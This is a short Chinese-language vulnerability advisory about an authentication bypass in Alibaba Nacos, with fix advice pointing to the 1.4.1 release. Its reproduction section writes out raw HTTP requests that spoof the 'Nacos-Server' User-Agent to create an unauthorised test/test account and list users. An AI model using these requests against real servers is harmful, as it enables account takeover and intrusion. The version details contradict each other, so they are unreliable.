阿里Nacos安全漏洞以绕过身份验证
0x01 漏洞描述
nacos最新版本1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制,依然存在绕过问题,在nacos开启了serverIdentity的自定义key-value鉴权后,通过特殊的url构造,依然能绕过限制访问任何http接口。
0x02 漏洞影响版本
nacos< 1.4.1
0x03 漏洞复现
1、访问网站
2、构造参数
1、添加用户,密码
POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1Host: xxxx.comUser-Agent: Nacos-ServerContent-Length: 0Accept: */*Accept-Encoding: gzip
2、验证是否添加成功
GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1Host: xxxx.comUser-Agent: Nacos-ServerAccept: */*Accept-Encoding: gzip
3、进行登录(test/test)
4、登录成功
0x04:修复建议
2021年1月14日 Nacos 1.4.1刚发布,会直接在1.4.1进行hotfix。
请用户直接下载最新的1.4.1版本进行部署升级。
https://github.com/alibaba/nacos/releases/tag/1.4.1